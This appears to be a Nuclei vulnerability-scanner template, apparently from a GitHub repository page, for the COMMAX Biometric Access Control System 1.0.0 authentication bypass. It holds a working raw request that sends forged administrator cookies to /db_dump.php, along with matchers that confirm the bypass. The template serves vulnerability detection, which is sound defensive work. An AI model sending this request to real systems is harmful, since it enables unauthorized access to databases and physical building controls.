nuclei-templates/vulnerabilities/other/commax-biometric-auth-bypas...

36 lines
1.2 KiB
YAML
Raw Normal View History

id: commax-biometric-auth-bypass
info:
name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
author: gy741
severity: critical
description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
reference:
- https://www.exploit-db.com/exploits/50206
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
tags: commax,auth-bypass
requests:
- raw:
- |
GET /db_dump.php HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: {{BaseURL}}/user_add.php
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>::: COMMAX :::</title>"
- type: word
part: header
words:
- "text/html"